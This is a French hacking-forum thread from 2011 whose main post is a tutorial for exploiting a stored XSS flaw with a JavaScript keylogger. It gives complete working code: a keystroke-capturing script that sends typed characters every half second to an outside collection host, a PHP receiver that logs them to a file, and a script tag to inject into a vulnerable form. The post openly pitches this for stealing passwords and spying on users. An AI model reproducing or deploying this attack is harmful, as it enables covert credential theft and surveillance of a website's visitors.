FranceHack Index du Forum
S’enregistrerRechercherFAQMembresGroupesConnexion
:: Exploiter une faille XSS ::

 
Répondre au sujet    FranceHack Index du Forum » Failles et Exploits » XSS Sujet précédent
Sujet suivant
:: Exploiter une faille XSS ::
Auteur Message
Yohann666
Invité

Hors ligne




Message :: Exploiter une faille XSS :: Répondre en citant
:: Exploiter une faille XSS ::


Bonjours, voici un tuto afin d'exploiter une faille XSS à l'aide d'un keylogger écris en jacaScript.

Qu'est ce qu'un keylogger ?
"Keylogger est un petit programme malicieux capable d’enregistrer toute frappe du clavier, il est cependant utile pour récupérer des mots de passe saisis par l’utilisateur, ou alors, sniffer des conversations à son insu ! " merci pour la def claire et précise Jacouille .

--Tout d'abord nous allons crée un keylogger codé en javascript voici le code ( je ne pense pas qu'il y est des erreur mais vérifiez tout de même ) :



 
  
Citation:


 
Code:

var keys='';
document.onkeypress = function(e) {
  get = window.event?event:e;
  key = get.keyCode?get.keyCode:get.charCode;
  key = String.fromCharCode(key);
  keys+=key;
}
window.setInterval(function(){
  new Image().src = 'http://toto.com/keylogger.php?c='+keys;
  keys = '';
}, 500);










Bon ce script est relativement simple donnez lui un nom comme " keylog.js ". Maintenant enregistrer le dans votre serveur ( Attention il doit supporter le JavaScript !   )



--Bon maintenant on vas créer un script " php " afin qu'il crée un fichier log.txt dans notre serveur et y insere les information collecté par $_GET. Voici le code :


 
  
Citation:

 
Code:
if(!empty($_GET['c'])) {
  $f=fopen("log.txt","a+");
  fwrite($f,$_GET['c']);
  fclose($f);
}







--Enfin , dans un formulaire, qui n’échappe pas à la faille XSS, insérez ce code :


 

  
Code:


<script src="http://toto.com/javascript.js"></script>

Le script sera exécuté a chaque visite.

Voila ce tutoriel est terminé posé vos question si vous en avez je serais ravie de vous répondre !


Tutoriel fait par : KBtarantino
Merci a lui !
  



Jeu 5 Mai - 19:37 (2011)
Publicité






Message Publicité
PublicitéSupprimer les publicités ?

Jeu 5 Mai - 19:37 (2011)
Azrakel
Invité

Hors ligne




Message :: Exploiter une faille XSS :: Répondre en citant
Bon tuto merci du partage


Mar 25 Juin - 23:58 (2013)
Contenu Sponsorisé






Message :: Exploiter une faille XSS ::

Aujourd’hui à 03:09 (2016)
Montrer les messages depuis:    
Répondre au sujet    FranceHack Index du Forum » Failles et Exploits » XSS Toutes les heures sont au format GMT + 2 Heures
Page 1 sur 1

 

Portail | Index | créer un forum gratuit | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
Powered by phpBB © 2001, 2005 phpBB Group
Design by Freestyle XL / Music Lyrics.Traduction par : phpBB-fr.com